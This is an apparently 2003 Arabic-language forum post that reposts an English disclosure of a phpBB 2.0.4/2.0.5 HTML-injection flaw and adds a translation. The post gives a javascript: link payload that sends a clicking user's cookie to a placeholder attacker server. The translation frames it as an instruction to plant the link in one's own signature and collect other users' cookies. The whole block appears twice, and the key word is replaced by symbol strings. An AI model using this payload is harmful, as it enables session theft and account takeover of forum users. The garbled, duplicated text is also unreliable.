TaZ HaCkEr
10-09-2003, 06:17
المصدر : Security Focus
I have found a dangerous vunlerability in phpBB.
I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
are affected, but probably more versions are vulnerable.
If HTML is enabled for postings, a user can post a link like this:
<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='
+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>
If a user clicks it, his &@#&@#&@#&@#&@#&@# will be sent to the attacker, which he
can use to log on as the user if autologon is enabled.
ترجمه : حصلت ثغره خطيره في phpBB وقد وتحققت منها على الاصداره
2.0.5 و 2.0.4
اذا كان HTML ممكن في التواقيع , ضع في توقيعك لينك مثل هذا
<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='
+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>
اذا ضغط عليه سوف يرسل الكوكيز اليك ...
TaZ
I have found a dangerous vunlerability in phpBB.
I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
are affected, but probably more versions are vulnerable.
If HTML is enabled for postings, a user can post a link like this:
<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='
+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>
If a user clicks it, his &@#&@#&@#&@#&@#&@# will be sent to the attacker, which he
can use to log on as the user if autologon is enabled.
ترجمه : حصلت ثغره خطيره في phpBB وقد وتحققت منها على الاصداره
2.0.5 و 2.0.4
اذا كان HTML ممكن في التواقيع , ضع في توقيعك لينك مثل هذا
<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='
+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>
اذا ضغط عليه سوف يرسل الكوكيز اليك ...
TaZ